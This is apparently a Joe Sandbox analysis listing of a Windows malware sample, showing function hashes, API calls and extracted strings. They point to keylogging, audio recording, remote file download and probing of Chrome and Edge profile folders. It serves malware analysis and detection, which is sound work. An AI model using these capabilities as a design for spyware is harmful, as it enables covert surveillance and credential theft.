                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MetricsSystem
                                • String ID:
                                • API String ID: 4116985748-0
                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                • String ID: image/png
                                • API String ID: 1291196975-2966254431
                                • Opcode ID: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                • Opcode Fuzzy Hash: d4f259a593197f1d9dbe7f79535cfb99d89987488e7eb69950e532603a38181c
                                • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                                • GetFileType.KERNEL32(00000000), ref: 00449C4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileHandleType
                                • String ID: =k
                                • API String ID: 3000768030-1421436146
                                • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                                • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-1507639952
                                • Opcode ID: d7ff175fedf05b7445783633cdb62c4b571b838359eb1ad13fe403eca5861c2a
                                • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                • Opcode Fuzzy Hash: d7ff175fedf05b7445783633cdb62c4b571b838359eb1ad13fe403eca5861c2a
                                • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: =k
                                • API String ID: 269201875-1421436146
                                • Opcode ID: 84a0aec2fcd2e2198f060eb42423dc6b0e3e67b852f19c5b56d6cf535939c4c8
                                • Instruction ID: 33e0fe0941749f3336bda6be3c0f63978f5ebcf9e4adac19a04b7d23778c801b
                                • Opcode Fuzzy Hash: 84a0aec2fcd2e2198f060eb42423dc6b0e3e67b852f19c5b56d6cf535939c4c8
                                • Instruction Fuzzy Hash: A511D371A002104BEF209F39AC81B567294A714734F14162BF929EA2D5D6BCD8815F89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Sleep.KERNEL32 ref: 00416640
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadFileSleep
                                • String ID: !D@
                                • API String ID: 1931167962-604454484
                                • Opcode ID: 1138a700532d9599964523c42fe9d14b17403e05a5b04461eb8da4684f43988c
                                • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                • Opcode Fuzzy Hash: 1138a700532d9599964523c42fe9d14b17403e05a5b04461eb8da4684f43988c
                                • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: cfeb685ec421024236c3fe8a582943f52c7b46feb71b451bddb7413a3931a58d
                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                • Opcode Fuzzy Hash: cfeb685ec421024236c3fe8a582943f52c7b46feb71b451bddb7413a3931a58d
                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$hYG
                                • API String ID: 1174141254-2782910960
                                • Opcode ID: e0a8a6f2d7e4cdede1675b5f964430e951fa820bb9e9f60fc8bb9b9bf6386c36
                                • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                • Opcode Fuzzy Hash: e0a8a6f2d7e4cdede1675b5f964430e951fa820bb9e9f60fc8bb9b9bf6386c36
                                • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                • String ID: Online Keylogger Stopped
                                • API String ID: 1623830855-1496645233
                                • Opcode ID: 33f513a8367aa60c9c39e45db4b09adeb783fa014ebf533a38ecdd59b48b7fa1
                                • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                • Opcode Fuzzy Hash: 33f513a8367aa60c9c39e45db4b09adeb783fa014ebf533a38ecdd59b48b7fa1
                                • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                • _free.LIBCMT ref: 00449ACC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$DeleteEnter_free
                                • String ID: =k
                                • API String ID: 1836352639-1421436146
                                • Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                • Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
                                • Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                • Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _abort.LIBCMT ref: 0044F0A9
                                • _free.LIBCMT ref: 0044F0DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_abort_free
                                • String ID: x9k
                                • API String ID: 289325740-1900533136
                                • Opcode ID: 2e9ada046b615cce909465303d253cbb0255e834f3ab9ea9ae3315e12a655f22
                                • Instruction ID: 2af8ca7d7d9da888dd2a293bb18e2fdfe9fbdc3dbac3c8495f7aa1b7b8b1e2f7
                                • Opcode Fuzzy Hash: 2e9ada046b615cce909465303d253cbb0255e834f3ab9ea9ae3315e12a655f22
                                • Instruction Fuzzy Hash: F2010871D01A218FEB30AF6A840125EB7A0BF44715B15422FE52863352CB7C6D46CFCE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • waveInPrepareHeader.WINMM(006AE1F0,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                • waveInAddBuffer.WINMM(006AE1F0,00000020,?,00000000,00401A15), ref: 0040185F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferHeaderPrepare
                                • String ID: XMG
                                • API String ID: 2315374483-813777761
                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: H%j
                                • API String ID: 269201875-3294387659
                                • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction ID: ffc8389238c956ab6c1ca4f2b01b58cd1871601a5e35f3520dab429f03a8b914
                                • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                • Instruction Fuzzy Hash: 7DE0E592A0182014F6717A3F6C0575B0545CBC2B7FF11833BF538861C1CFAC4A46519E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocaleValid
                                • String ID: IsValidLocaleName$JD
                                • API String ID: 1901932003-2234456777
                                • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                • API String ID: 1174141254-4188645398
                                • Opcode ID: f1acc3cc63483105fb3c6833ea2415d43d59c245a1346c36ac9ceb6aca08711c
                                • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                • Opcode Fuzzy Hash: f1acc3cc63483105fb3c6833ea2415d43d59c245a1346c36ac9ceb6aca08711c
                                • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                Strings
                                Memory Dump Source
